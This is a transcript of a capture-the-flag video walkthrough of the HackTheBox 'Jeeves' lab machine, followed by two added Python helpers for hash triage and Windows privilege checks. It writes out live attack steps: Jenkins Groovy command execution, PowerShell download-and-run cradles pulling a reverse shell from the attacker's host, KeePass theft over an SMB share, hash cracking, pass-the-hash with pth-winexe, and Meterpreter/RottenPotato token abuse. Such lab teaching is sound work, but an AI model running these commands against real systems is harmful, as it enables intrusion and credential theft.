HackTheBox - Jeeves
Key Takeaways
The video walks through the HackTheBox Jeeves machine: nmap and gobuster enumeration, avoiding the IIS rabbit hole on port 80, finding an unauthenticated Jenkins instance behind Jetty on port 50000, using the Jenkins Script Console (Groovy) for command execution, a Nishang PowerShell reverse shell, PowerSploit's PowerUp (dev branch) for privilege-escalation checks, exfiltrating a KeePass database over an Impacket SMB share, cracking it with hashcat, passing the recovered NTLM hash with pth-winexe to get an administrator shell, and reading root.txt from an NTFS alternate data stream. Jenkins deserialization bugs are mentioned only as something to rule out by checking the version; the unintended root path is SeImpersonatePrivilege abuse with RottenPotato and Metasploit's incognito extension.
Full Transcript
What's going on YouTube, this is IppSec and we're doing Jeeves from HackTheBox, which is a pretty cool box because, well, it's got rabbit holes, but if you do your enumeration correctly you can quickly get out of the rabbit hole before you waste time and find a Jenkins instance that doesn't have authentication, which means there's a few ways to get code execution. We'll do two different ways and get a shell on the box, and once you get a shell on the box there's two ways to go up to root or administrator. The first way is the standard Windows one, Rotten Potato; we'll show that at the very end of the video. The intended way is to find a KeePass database. Once you get the KeePass database you can crack it, and then you find an NTLM hash in it, which you can use to pass the hash to the administrator user and get admin that way. Once you're admin though, you go into the administrator's desktop and there's no root.txt; the file is hm.txt. So doing more enumeration you identify that there's an alternate data stream, just like in Minion, and you can extract root.txt from that file, and then the box is done. The Rotten Potato method, we'll show you how to do that in Metasploit, and then whenever I get around to doing the Tally video we'll do all that without Metasploit. So yeah, let's just jump in.

We're gonna start off with an nmap. So nmap -sC for default scripts, -sV to enumerate versions, -oA to output all formats, put it in the nmap directory and call the files initial, then the IP address of Jeeves, which is 10.10.10.63. It does take some time, so I've already run it. Just looking at the results we see that Microsoft IIS, Internet Information Services version 10, is listening on port 80, we've got SMB open, port 50000 is running a Jetty web server, and that is about it. So IIS 10: this is Windows 10 or 2016. If you did not know that you can just Google like "IIS versions" and you should come to a page that says like 6.0 is 2003, 7 is 2008, 7.5 is 2008 R2, 8.0 is 2012, and then a few more rows. If you click the link you'll go to the TechNet page, or whatever Microsoft calls this, and see all the versions. It doesn't look like this was updated for Windows 10, but seven, eight, nine, so we go to ten. Actually the real reason I think Microsoft skipped version 9 is because of bad developers just doing some type of regular expression and saying hey, if the version begins with nine it's gonna be legacy, because that's 95, 98; if it begins with anything else then it's like a 2000-era box. So where were we? Oh, we have to check port 80 and 50000.

So if we go to 10.10.10.63 we see an Ask Jeeves page. If we go to 10.10.10.63 port 50000 to see what Jetty is: nothing, so 404. Before we do any poking let's just set up some enumeration in the background, and that will be gobuster. So gobuster -u http://10.10.10.63, -w for the wordlist, /usr/share/wordlists/dirbuster/directory-list-2.3-medium, -t 15 threads, and I need to do the help real quick: gobuster -h, how do we save the output, is it -o? So this will be -o apache.txt, and then we will get a new window, copy this, do -o jetty.txt and we change this to port 50000. Okay, so now let's look at this Ask Jeeves thing. Looking at these links, if you look in the bottom left corner of my browser they all go to a pound, a hashtag, which means they go nowhere. So test a search, click it and we get an error message. However, if we did enumeration correctly we know that this error message is probably just a picture, because we can't highlight anything, but more importantly: Microsoft SQL Server 2005. Kudos to whatever developer can get this running on Windows 2016. We have a date of 2009 and the Windows 2016 release date is, let's see, 2016, go figure, I should have guessed that one. More Microsoft SQL here, a really old ASP.NET version, I don't know if you can relate ASP.NET versions to OS, I don't think so. But Ctrl-U, we can see it just goes to jeeves.png. So let's go back a page and look at the source code, and we see that the form action is just going to error.html. So we know this field is nothing, it's just going to direct us to error.html every time, which is an error message in the form of a picture of a really old version of Windows, and yeah, that's not worth enumerating.

So let's go back to see if dirbuster found anything, or gobuster. Nothing on Apache; we have /askjeeves on Jetty. So let's go to 10.10.10.63, port, not ten thousand, fifty thousand, and we see a Jenkins instance. So the first thing I will do is check the Jenkins version and when this was released, because I know Jenkins has a bunch of deserialization vulnerabilities. So changelog, see, we're on 2.87. So search 2.87, is it 2.87? Okay, so 2017 October 29th, so chances are this is around the time Jeeves got released, which means we're probably not looking for a CVE in Jenkins because it's by far the most up-to-date version. Looking at red, because red means bad, we don't really see anything. Deserialization, grep, nothing too interesting there, nothing too interesting. Go to the very top of the page, because we know Jenkins loves deserialization vulnerabilities; we looked, the last one was 2018, before then, so we can start ignoring that. It does look like we're already authenticated or something, so anonymous access may be allowed, because we shouldn't be able to do all of this type of stuff, we should just get a login prompt.

And there's two ways you can get code execution, that I know of, on Jenkins. One is this bad way of creating a whole new project. I call this the bad way because it's noisy, people can see a new project, but I'll show what this does in case you don't have access to the other way I normally do it. So here we have like post-build actions or build actions, and we can execute Windows batch commands, shells. If we click that we can type a command here and it executes when you build. We're not gonna do that though, because I don't like that, I think it's blind and it's just disgusting. So if we go to, let's see, Manage Jenkins and, let's see, is it Jenkins CLI or Script Console? Script Console. And we see it says type in an arbitrary Groovy script and execute it on the server. This sounds very bad. It's also giving us a handy tip of using println to see the command output, because System.out will go to the service's standard out, which is harder to see. So I know a little bit about Groovy, and the little bit I know is how to execute commands. It's just like foreign languages: in foreign languages I know a lot of languages if all you want to do is insults; in programming languages I know a lot of languages if all you want to do is bad things, like execute shell commands. So if you didn't know how to execute commands in Groovy you could just go to Google and say "groovy command execution" etc. But we're just gonna do cmd = "whoami". whoami is just a simple command that we should have privilege to do. Then we're also going to do println so we can see the output: println cmd.execute().text. If we click Run we should get the output when this finishes. And hold on, I screwed up, there we go, we don't want that in quotes because we have a variable. If we just did like "whoami" in quotes then we didn't have to add this variable. Let's just open a new window, I don't know what it's doing, oh, I should have copied that, I did not, my bad. cmd = "whoami", println cmd.execute().text, Run, and we get we are jeeves\kohsuke, and I don't know what that word is, probably a different language or something. But anyways, we have code execution.

So the next step with code execution is getting a shell. So we Google like "nishang github", it brings you to a really cool page. So I'm gonna do this: make the www directory, we'll go in there, I have Nishang stuff in /opt/PowerShell/nishang and we want, let's see, probably Pivot? Nope, that's not it. Shells, we want Shells. We have a bunch of PowerShell one-liners, or PowerShell ways to get shells, and I think we did this in Minion as well, or whatever box we needed to do an ICMP shell on, but the ICMP shell is horrible. So we're going to go to PowerShell TCP. We don't want to do the one-line; if we wanted to paste the PowerShell inside of this we'd do the one-line one, but I'm gonna do an Invoke-Expression to my web server so I don't have to worry about that. Copy this into a folder, and again, I just don't like changing things in the GitHub pull directories or whatever it is, I'd rather just copy it out, edit it to my needs and then carry on. So we can look at this and we see the example: Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [port], whatever. So the easiest way to copy, I do it that way: delete the line, then you can just do p and put it wherever, and the reason why I'm putting this at the bottom is so it auto-executes as soon as we run it. What is my IP address? We are .30 and we'll do port 8001. If we didn't do that we could probably just add that line in this script console after the IEX, but I like just IEX and get a shell.

So powershell IEX, we have a lot of quotes because this will use a single quote and a double quote. Let's start with something, let's do triple quotes and then echo hello world in double quotes, does this work? cmd: that did not. There should be a way to do this. That did not work, oh, I have unbalanced quotes, click Run and still not: cannot find the file specified. Oh, because I have cmd here, I'm assuming this is calling like command prompt, it's not, so we have to do cmd.exe /c, let me do echo hello world, and there we go, that should be what we want. So now I don't want to worry about silly quotes, I can just do powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.30/rev.ps1'), single quote and double quote, because we want this in double quotes, and that should execute. So we have to move Invoke-PowerShellTcp to be rev.ps1, start this HTTP server, and we have to start a reverse shell listener, and just because I like my reverse shell on the left I'm gonna do HTTP over here: cd www and then nc -lvnp 8001. Click Run, we see it GET rev.ps1, rev/ps1, and we want it to GET rev.ps1. Click Run, go ahead and get it, it's going slow, there we go, rev.ps1, connect from unknown and it's loading a shell. So if we do whoami, this isn't the fastest shell, it's going slow for some reason, but we are good.

So the next thing to do would be, let's do like PowerUp. So oops, let's go to www and I'm going to download PowerSploit actually, and I always like using the development branch of PowerSploit just because it has some newer things. So if we do git clone -b dev, I think that's the branch, yep, branches, dev, okay. So PowerSploit, Recon, and let's PowerUp, it's in Privesc, there it is. So IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.30/PowerSploit/Privesc/PowerUp.ps1'). Okay, we loaded it and we didn't execute it because we don't have any commands at the end of this. So if we go to that window, less PowerUp, what? There we go, this is just a script and it's not executing anything at the end, so we actually have to give it the command or put something at the end. I didn't do that because this does have arguments and stuff I may want to do, so I just loaded the script and we can see what to do. It's like all checks, I think, so Invoke-AllChecks, that's what we want, Invoke-AllChecks, and maybe it'll run. The box is going slow so it could take a while. We'll rename this window to shell one, powerup will do. PowerSploit has some errors, that's fine, and then create a new one, we'll do nc -lvnp 8002, and go back here. Good, Jenkins, we lost our script, so go to HTTP history, we can search with IEX and we'll just go to Repeater and change cmd powershell New-Object rev.ps1. Okay, so go back to PowerShell, edit rev.ps1 to be rev2.ps1, okay, and we'll do this on port 8002. You don't need that cd www anymore, do it, and change rev.ps1 to rev2, click Go and we got another shell, so we can do stuff while PowerSploit's running. Oh, it finished. So now we have a backup shell; let's take a look at what PowerSploit found. Privilege SeImpersonate: this is not in master, master doesn't go and look at tokens, the dev branch does. So SeImpersonate, this means that Rotten Potato is going to work, so we have a privesc there. That is not the intended privesc but it is a privesc, and we'll do that at the end of the video.

Service name Jenkins, so what is this saying? We may be able to modify jenkins.exe but we can't restart it, so we have to find a way to reboot the box after doing that. So we're not gonna do that because, well, we won't be able to screw with it. It's a modifiable service file check, so what it's saying is there's a service Jenkins and we should be able to modify jenkins.exe, and then when the service restarts it starts the executable that we put in. Unintended path, we can cat this PowerUp to see what this is. So whoops, type unattend.xml and see if there's a password here. This is bigger than I expected. Public, token, "sensitive data deleted", so it's probably gonna be nothing interesting here. "Sensitive data deleted" again, so nope, nothing there. Can we view anything else? Administrators, we cannot. So if we go to kohsuke, which is our user, see if there's anything here. We go to Desktop, we got the user.txt. So if we wanted to we could do like Get-Content user.txt, and instead of actually doing this we'll only get sixteen characters, so (Get-Content user.txt).Substring(0,16), and there's the first 16 characters of user.txt. We see the length is 32, so you know there's more characters after that, it's the MD5 hash, I just want to show it on stream. So let's see, go to Documents and we have a KeePass database, CEH. So what we're going to do is on Zoom I'm going to go back into the Jeeves directory, make a directory called smb, because we want to copy this file and it's a pain to copy the file. We could do a bunch of PowerShell junk and get the KeePass database, but we could also just do, what is it now, crap, I am blanking on the name, Impacket, impacket-smbserver, and we have to give it a share name. So the share name is going to be pleasesubscribe and then the path, and we'll just do `pwd` as the path. So now we have an SMB server listening on our box with the share pleasesubscribe that anyone can write to. So we're going to do New-PSDrive -Name followontwitter -PSProvider FileSystem -Root and then we can do \\10.10.14.30, which is our IP, \pleasesubscribe, the share name, and that should be it. There we go, we have mounted that file system. So if we went, we could actually cd to the pleasesubscribe drive, oh no, we called it followontwitter, cd followontwitter: and now if I created a file ippsec-youre-awesome and we look at this we have the followontwitter youre-awesome, and it's a zip set. So we can copy the CEH.kdbx to a local directory. If we go here we now have the KeePass database.

So there is a keepass2john and that converts it into a hash that we can crack. So we're gonna copy this, and we're also going to go, because I hate using John, I'm gonna do hashcat example hashes and then see what we can do. So KeePass, we have a few formats. KeePass, 50000? See, KeePass 2, 6000. So we have probably this format, KeePass 2 AES without keyfile, so 13400. So I'm gonna SSH into my box. I don't recommend doing any cracking in VMs because it's a CPU-intensive thing, or GPU-intensive, and well, that doesn't go well. So doing the hashcat: we can create a new file in hashes called jeeves.keepass, place the file there, ./hashcat hashes/jeeves.keepass, I want to do -m 13400 I think, yep, and then the dictionary file, I think I put the dictionary, yep, wordlists, there we go, and we'll start with rockyou and see how fast this goes, and then if we want we can start adding rules to the end of that. Initializing device, it's taking quite a while, there we go, and it already cracked. So the password is moonshine1 for this KeePass database. So let's see, go ahead, KeePass on Kali, keepassx and keepass2, which I, keepassx, we don't want that, HTB boxes Jeeves, there it is, smb, password moonshine1: wrong key or database is corrupt. So what should I, keepass2, Open, boxes, Jeeves, we go moonshine1, there we go.

So now we have a bunch of hashes. My passwords, Walmart, anonymous, we click this, we should be able to view it, password Michael321. Bank of America, that is 12345, DC recovery, administrator, and this. So we can try this and since we have SMB what we're going to do is, let's see, we'll call this second shell, ssh we no longer need, we'll create a userpass text file and start putting some of these in. So we know the only users on the box were like administrator and kohsuke, when we went into C:\Users, so those are the type of ones I want. So copy password administrator, that Jenkins admin, copy that password, doesn't have a password set. Backup stuff, question mark, copy password, what is this, it's an NTLM hash. That's interesting, and I say NTLM right away because this is LanMan and that's NTLM; I know this is LanMan because aad3b, this is a blank LanMan hash and this is the NTLM. It's just stuff you realize when you look at this stuff often. Nothing else in any of those, wait, okay, yeah, so we really only have two things to try, administrator and this NTLM hash. So, well, did something, undo. So if cat userpass and we can just try, was it, Impacket, is there smbexec, wmiexec would work, let's do winexe, do a pth-winexe, yeah, winexe -U, let's see, -U domain/username, it is Jenkins/administrator and then the password. I think we could specify after, we hit enter, or do cmd.exe, we also have to specify the host, so //10.10.10.63, password, paste that in. Unable to connect, that was the password I put in. So now we'll do cat this again and this time we'll do pth-winexe, and we can copy this and we get in. So we did the pass-the-hash attack and that is the administrator password, and the reason why I tried administrator first is because, again, when we went into this Users directory I knew it was kohsuke or administrator, and well, we were kohsuke, whatever it is, so we didn't want to try him because we already had his account. So I want administrator.

We go in here, go to Desktop and there's a file hm.txt, and this created a bunch of headache for a lot of people because people kept thinking someone was deleting the root flag. Eventually I put in this comment saying "the flag is elsewhere, look deeper", because it was crazy how many people just got so frustrated. If you do a dir /R, to view, what is it, alternate data streams, we can see that this file has root.txt, and this is also in Minion. It's just a way to essentially put a file within a file, and this is an NTFS attribute, so if I copied this file to my Kali box I wouldn't be able to access this. If I add something, and more interesting is this doesn't change the MD5 sum of the file, so if I modify the alternate data stream in text it would, to hm.txt, and not change the MD5 sum, sha-whatever-sum you want on the file, because it's a separate file, it's just making a file a folder essentially. So if we want to view the stream we can do, I like PowerShell, we could probably do streams.exe, that's gonna screw up my interpreter isn't it, Ctrl-C. Let's go up, grab this hash and let's just specify it in the command line, so percent hash is how you specify the password in winexe, and the percent comes after the username. So cd \, cd Users, I really hate not having a real shell, not a real cd, cd, what is it, Desktop, okay. So streams.exe, this stream, streams.exe right here, I want to do it a way, I know, I thought there was a file called streams.exe, a streams executable on Windows, but in PowerShell we can do Get-Content hm.txt -Stream, we want the stream of root.txt, and I'm doing Substring so you guys can't see the full file, just like we did with user.txt, and we can see this file. So that is it, that is the box.

However, I promised you a different way to do this box and this is going to be kind of a precursor to the Tally video that's gonna come one day, hopefully soon. I want to do a bunch of like antivirus evasion in that video and stuff, it's a good box to do a lot of cool things on, which means it's gonna take some time, and take some time prepping and me making sure I'm doing things the best way. But as a teaser: we are now kohsuke and we want to go and get root, so we're gonna use Metasploit and we're gonna do the Rotten Potato thing, because if you remember when I did the PowerUp it said there was a suspicious token. I do whoami /priv, we can see all the tokens we have, and if we go to, let's see, Foxglove Security Rotten Potato, I highly recommend reading this post and watching the video, but that's not exactly what I wanted to show. If we go down to the very bottom, "Abusing Token Privileges For Windows", this is a really good blog post and it has a bunch of interesting tokens, and this is just like privilege levels for Windows, and with each of these we'll probably be able to do a privesc. So we went to that whoami and see: shutdown privilege, not in this list; change notify, not in the list; undock, not on the list; SeImpersonatePrivilege, SeImpersonatePrivilege is in this list, and this one is just abusable by Rotten Potato. So let's see, what do I want to do next? Let's go back into, now we can stay on this share drive, let's go /opt/unicorn because I want to get a Meterpreter shell. So I'm going to do python unicorn.py and we're just going to do windows/meterpreter/reverse_http, so we copy this and say we are 10.10.14.30. It's gonna take a little bit of time, not much, to create shellcode for us and make it in a pretty powershell_attack file. So if we look at powershell_attack, a bunch of obfuscated junk. I'm going to copy the whole attack to Documents/HTB/boxes/Jeeves, I think, what user do I run as, what's the user's name, is it Jeeves or Jenkins, I could have screwed something up earlier, no, that was with the winexe and it worked, I don't think I did, oh, sorry for that, copy that there, and we can do, I'm going to copy this unicorn.rc file also into that same directory, and then go in, I'm gonna move that unicorn.rc out of it and make a directory msf and move unicorn there, and then we can just do msfconsole -r to spin up a Metasploit listener. While that goes, cool, could not connect to server database, so this first, rescue will start, there we go. While it goes we're gonna go rottenpotato.exe and what do we want, github foxglovesec rotten potato, and we're just going to download this, download, save the file. So now we got the handler running and in this we should have powershell_attack, so we're going to rename that to msf.txt, program this process, and we can just do IEX, breaking here, we go, (New-Object Net.WebClient).DownloadString('http://10.10.14.30/powershell_attack.txt'), that should get us a listener. I renamed it, here it is, rename to msf.txt, go with the Metasploit and Meterpreter session 1 opened. So we do sessions -i 1, do a pwd, see where we are, we're in the pleasesubscribe directory, so let's just do copy rottenpotato there so we can see, cp downloads rottenpotato, and we can execute this, but before we do let's drop to a shell. I wonder if we have a token option in this, let's see, it's like list_tokens. I'll just go to the very top and then we'll slash to search for token, job token, no, steal_token, nope, I don't see any of them. Let's just go to shell, whoami /priv, and we have SeImpersonate, so we can exit with a load incognito, and this extension is the thing that just lets us play with tokens, and now that I have that let's do help. Incognito commands: list_tokens, that's what I was looking for. If we list_tokens -u, no tokens available, -g, so we don't have any impersonation tokens available yet. And I think I kept calling, uh, I don't know, I think I have called something by the wrong term earlier in the video but I can't remember now. Anywho, that'll all be explained better in the Tally video whenever that comes. For now we need to get the impersonation token, and to do that it's really easy: execute -cH -f rottenpotato.exe, and now list_tokens -u, -g, impersonation tokens available, no, NT AUTHORITY, so where was it before, -g, yeah, BUILTIN\Users, so now Administrators. So let's impersonate_token BUILTIN\Administrators. This isn't how I thought it would work, I screwed something up I think, I don't think this is gonna work, nope, we did. So I expected it to say like NT AUTHORITY\SYSTEM somewhere, local account, authenticated users. So let's see who we are: whoami, NT AUTHORITY\SYSTEM. So now Users, cd Administrator and we are the administrator user.

I'm going to do this one more time because that did not go as smoothly as I wanted. So winexe, kill Meterpreter, clear this and do this one more time. So go back to the PowerSploit session, looks like your thing's still hung, so thankfully we have, I thought we had a second shell, that's just nc -lvnp 8002, go back here, go, got a shell, load Meterpreter, passenger side, load incognito and I'm going to split this a different way, let's put it this way, and list_tokens -u, oh yeah, we can't do it anymore because I gave the Jenkins process the NT AUTHORITY\SYSTEM token. This is what I expected to see. Let's go back up and trace what we did, let's see, can we, that was in this, so this is what I had expected to see: delegation token, impersonation token. I did a command I think I did not expect, let's see, yeah, that's weird. So executed rottenpotato and then had done list_tokens and we didn't have the impersonation token, so what probably happened is this exploit didn't finish running yet when I did this, and that's why I didn't see NT AUTHORITY\SYSTEM, and then when I ran -g that's when the exploit finished, and why I could get into BUILTIN\Administrators. Okay, that makes a little more sense. So if we have, let's see, can we restart Jenkins and then re-exploit this and see if it works? So shell, and let's do, what is it, to restart a service, well I think sc query state running will list services, sc query, there we go, then we can probably just search this for jenk and we see the service name is Jenkins. So we can do powershell Restart-Service Jenkins, and that stopped Jenkins and watch this kill the shell: access is denied. whoami, let's impersonate SYSTEM so we can restore the service, so impersonate_token NT AUTHORITY\SYSTEM, not currently running as SYSTEM, what? list_tokens -u, there, tokens available, -g, huh, that's weird, the last time we did that we had the administrator token. Okay, well, pwd, we're in Jenkins, so let's upload rotten, no, HTB/Documents, HTB boxes, Documents/HTB/boxes/Jeeves and we put it in smb, rottenpotato, mash, bleep, it doesn't like that tilde. Upload, okay, execute -cH -f rottenpotato.exe. I'm going to give it a few seconds before I list tokens to let the exploit run. There we go, list_tokens -u and now we can impersonate the token, and I don't know why I just did that because I was trying to do the exploit again, which I just did. Let's try one last thing and then we'll finish: replacing the executable. Do we actually have write permission to that? So let's see, whoops, IEX, execute this, and we were searching a session for Invoke-AllChecks. So this is what, going back to this, says that we're able to modify the Jenkins binary but we can't restart the service, but we should be able to do something. Install-ServiceBinary, I actually don't know what that's going to do. Let us use msfvenom to create a Meterpreter: so msfvenom -p windows, what is it, meterpreter/reverse_https, and then we need LHOST=10.10.14.30, LPORT=443, -f exe, -o msf.exe, and we'll see if this actually works. There may be antivirus on the box that's going to make this a little bit of a pain to do with an executable. file msf.exe, PE32, we probably want 64-bit, so is it windows/x64/meterpreter, okay, file msf.exe, and let's, we copy this into that msf directory, we can just upload it straight. So sessions -i 3, list_tokens -u, load incognito, we're just verifying we don't have any admin tokens. I wonder, when I restarted Jenkins did I actually lose that token immediately? Shell, exit, when do I lose that token? So powershell Restart-Service Jenkins, I don't think it actually restarts because I get that error message, however the tokens are only good for some such period of time, that's weird. Well, as long as I don't impersonate I should just be not admin. So let's go to cd Users, cd Administrator, access denied. Should be going to Administrator\.jenkins I think it was. So we're not an admin user, let's see if we can modify jenkins.exe, so, well, copy jenkins.exe to jenkins.bak, okay, so we have write access to this directory, jenkins.bak, okay. So now let's exit and try uploading, so upload msf.exe into that directory, and we have to do double backslashes or we could have done forward slashes, okay. So cd, then we can move msf.exe to jenkins.exe, move msf.exe jenkins.exe, overwrite, yes, access is denied. So maybe we can't write to it. echo tasks to jenkins.exe, it's being used by another process, so we may have to stop, Metasploit stopped Jenkins, in order to do this, so I'm not sure exactly how to exploit it that way. Sorry guys, went down kind of a rabbit hole for no reason, but hopefully that was a good learning experience, and I'll see you eventually. I'm not sure what else to show, so take care guys and see you next week.
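The KeePass entry that turns out to be an "LM:NT" pair, the blank-LanMan tell (aad3b435b51404eeaad3b435b51404ee), and the pth-winexe call are all worked through by eye in the video. The following is an added example, not IppSec's code, that does the same triage programmatically: it recognises a 32-hex:32-hex string as an LM:NT pair, flags the blank LM half, checks a candidate plaintext against the NT half (NT hash = MD4 of the UTF-16LE password; MD4 is implemented inline because hashlib's md4 is often unavailable under OpenSSL 3), and builds the pth-winexe argument list in the shape the video uses. The KeePass-style entries are constructed sample data, not the box's database.

```python
"""LM/NT hash identification and pass-the-hash preparation (added example)."""
import re
import struct

BLANK_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty/disabled LM password
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password


def _md4_block(state, block):
    """Process one 64-byte block per RFC 1320 (three rounds of 16 steps)."""
    x = list(struct.unpack("<16I", block))
    a, b, c, d = state
    mask = 0xFFFFFFFF

    def rotl(v, n):
        return ((v << n) | (v >> (32 - n))) & mask

    rounds = (
        (lambda p, q, r: (p & q) | (~p & r), 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (lambda p, q, r: (p & q) | (p & r) | (q & r), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda p, q, r: p ^ q ^ r, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for func, k, shifts, order in rounds:
        for i, idx in enumerate(order):
            v = (a + func(b, c, d) + x[idx] + k) & mask
            # Rotate the working variables so each step updates "a" in turn.
            a, b, c, d = d, rotl(v, shifts[i % 4]), b, c
    return [(s + v) & mask for s, v in zip(state, (a, b, c, d))]


def md4(data: bytes) -> bytes:
    """MD4 digest: pad to 56 mod 64, append 64-bit little-endian bit length."""
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    padded = data + b"\x80"
    padded += b"\x00" * ((56 - len(padded) % 64) % 64)
    padded += struct.pack("<Q", len(data) * 8)
    for off in range(0, len(padded), 64):
        state = _md4_block(state, padded[off:off + 64])
    return struct.pack("<4I", *state)


def ntlm_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), lowercase hex."""
    return md4(password.encode("utf-16-le")).hex()


def classify_secret(value: str) -> dict:
    """Is a recovered string a plaintext password or an LM:NT hash pair?"""
    m = re.fullmatch(r"([0-9a-fA-F]{32}):([0-9a-fA-F]{32})", value.strip())
    if not m:
        return {"kind": "plaintext", "value": value}
    lm, nt = m.group(1).lower(), m.group(2).lower()
    return {"kind": "lm_nt", "lm": lm, "nt": nt,
            "lm_blank": lm == BLANK_LM_HASH, "nt_empty": nt == EMPTY_NT_HASH}


def verify_password(candidate: str, nt_hex: str) -> bool:
    """Cheap local check before trying a cracked password over the network."""
    return ntlm_hash(candidate) == nt_hex.lower()


def pth_winexe_argv(domain: str, user: str, lm_hex: str, nt_hex: str,
                    host: str, command: str = "cmd.exe") -> list:
    """Argument list in the shape of the video's call: -U DOMAIN/user%LM:NT //host cmd.exe."""
    return ["pth-winexe", "-U", f"{domain}/{user}%{lm_hex}:{nt_hex}", f"//{host}", command]


# Constructed sample entries (titles only echo the video; values are made up).
SAMPLE_ENTRIES = {
    "Bank of America": "Password1",
    "Backup stuff": "aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c",
}

if __name__ == "__main__":
    for title, secret in SAMPLE_ENTRIES.items():
        info = classify_secret(secret)
        if info["kind"] == "lm_nt":
            print(f"{title}: LM:NT pair, LM blank={info['lm_blank']}, "
                  f"matches 'password'={verify_password('password', info['nt'])}")
            print(" ".join(pth_winexe_argv("Jenkins", "administrator",
                                           info["lm"], info["nt"], "10.10.10.63")))
        else:
            print(f"{title}: plaintext, NT hash would be {ntlm_hash(secret)}")
```

The NT half of the sample pair is the NT hash of the string "password", so `verify_password` demonstrates the offline check; on a real engagement the same function is how you confirm a cracked KeePass entry before spending a login attempt on it.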
Original Description
01:19 - Begin of Enumeration
04:15 - Avoiding the Rabbit Hole on port 80 (IIS)
06:00 - Begin of Jenkins
09:00 - Using Jenkins Script Console (Groovy) to gain code execution
12:00 - Reverse TCP Shell via Nishang
17:00 - Reverse Shell returned. PowerSploit dev branch to find unintended privesc (Tokens)
22:20 - Powersploit's Invoke-AllChecks completes
24:20 - Finding KeePass Database, using Impacket-SMBServer to transfer files
27:00 - Cracking the KeePass Database
30:20 - Using KeePass2 to open database
34:25 - PassTheHash via pth-winexe to gain administrator shell
35:20 - Grabbing root.txt that is hidden via Alternate Data Streams (ADS)
### BOX DONE
39:00 - Using RottenPotato to escalate to root via MSF
41:00 - Using Unicorn to gain a reverse MSF Shell
45:20 - Performing the attack
48:00 - Impersonating Token to gain root
### Unintended Done. Rest of video is me failing around, may be useful?
Good Read: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/
If you want to try Rotten Potato without MSF Read this: https://decoder.cloud/2017/12/23/the-lonely-potato/
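In the video the `whoami /priv` output is compared by hand against the Foxglove "Abusing Token Privileges" list to spot SeImpersonatePrivilege. The following is an added example, not IppSec's code, that automates that comparison: it parses the `whoami /priv` table and reports every privilege that is commonly abusable, with a one-line reason. The privilege-to-technique table is this example's own shortlist, and the `whoami /priv` text is a constructed sample modelled on a typical service-account token, not captured from the box.

```python
"""Triage of `whoami /priv` output for privilege-escalation candidates (added example)."""
import re

# Privilege -> why it matters. The example's own shortlist, not an exhaustive table.
ABUSABLE = {
    "SeImpersonatePrivilege": "Impersonate a client token handed to a local server: RottenPotato family",
    "SeAssignPrimaryTokenPrivilege": "Start a process under an arbitrary token: same Potato family",
    "SeBackupPrivilege": "Read any file regardless of ACL (dump SAM and SYSTEM hives)",
    "SeRestorePrivilege": "Write any file regardless of ACL (replace a service binary)",
    "SeTakeOwnershipPrivilege": "Take ownership of any object, then grant yourself access",
    "SeDebugPrivilege": "Open any process, including LSASS, and steal its token",
    "SeLoadDriverPrivilege": "Load a kernel driver",
    "SeTcbPrivilege": "Act as part of the operating system",
    "SeCreateTokenPrivilege": "Create arbitrary primary tokens",
}

# One table row: name, free-text description, then the State column.
LINE_RE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")

# Constructed sample, modelled on what a Windows service account usually shows.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_whoami_priv(text: str) -> dict:
    """Return {privilege_name: state} for every table row in `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def find_abusable(privs: dict) -> list:
    """List privileges from the shortlist that are present on the token.

    'Disabled' only means the privilege is not currently enabled on the token;
    the process can switch it on with AdjustTokenPrivileges, so disabled
    entries still count as present and are reported.
    """
    return [{"privilege": name, "state": state, "technique": ABUSABLE[name]}
            for name, state in privs.items() if name in ABUSABLE]


if __name__ == "__main__":
    found = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    for hit in find_abusable(found):
        print(f"{hit['privilege']} ({hit['state']}): {hit['technique']}")
```

On the sample token only SeImpersonatePrivilege is flagged, which is the same conclusion the video reaches before running RottenPotato; feeding the function real `whoami /priv` output from a shell is the only change needed to use it during an engagement.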